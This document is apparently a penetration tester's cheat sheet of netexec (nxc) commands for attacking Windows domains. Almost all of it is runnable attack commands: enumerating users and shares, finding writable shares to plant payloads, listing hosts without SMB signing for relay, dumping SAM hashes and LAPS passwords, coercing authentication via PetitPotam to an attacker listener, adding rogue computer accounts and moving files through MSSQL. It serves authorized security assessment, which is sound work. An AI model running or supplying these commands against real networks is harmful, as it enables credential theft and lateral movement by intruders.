# netexec (nxc)

nxc "is a network service exploitation tool that helps automate assessing the security of large networks."

# Basic SMB auth

nxc smb somehost -u user -p 'Winter2027!'

# Basic SMB auth (Kerberos)

I like to use getTGT, then export KRB5CCNAME=user.ccache and then here are some enumeration examples:

Enumerate domain users

nxc ldap domain.com --use-kcache --kdcHost domain.com --users

Connect to host with SMB:

nxc smb SOMECOOLSERVER --use-kcache

# Turn on logging

To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:

log_mode = True

# Change the Pwn3d label

You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:

pwn3d_label = Compromised!

# Find shares

nxc smb pcs.txt -u 'username' -p 'password' --shares

# Find only shares with READ or WRITE access

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE

# Filtering shares

If you want to find just READ/WRITE shares for example:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE

Or just WRITE:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE

If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.

grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt

# Find hosts with/without SMB signing

nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt

# Find hosts with/without SMB signing (alternate way)

# grep for anything where signing is set to false

nxc smb pcs.txt -u '' -p '' > signingcheck.txt

If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:

cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt

# Find hosts running WebClient service

nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav

# Find pre-created computer accounts

nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k

# Dump SAM database

nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam

# Coerce authentication

The nxc wiki has an interesting page on this - talking about the various ways nxc can coerce authentication.

NOTE

Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.

This also applies to the names of the vulnerabilities when specifying a method.

M=p // Invalid, as both petitpotam and printerbug start with ‘p’ so modules gives error

M=pr // Matches printerbug

M=pe // Matches petitpotam

M=dfs // Matches dfscoerce

# Coerce via PetitPotam:

nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe

# Add computer to the domain

nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!

# MSSQL commands

Lifted from the nxc wiki

# Execute database commands

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

# Get/put files

Get:

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file..txt /tmp/file

Put:

nxc 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt

# Dump LAPS passwords

Using an account with rights to do so:

nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps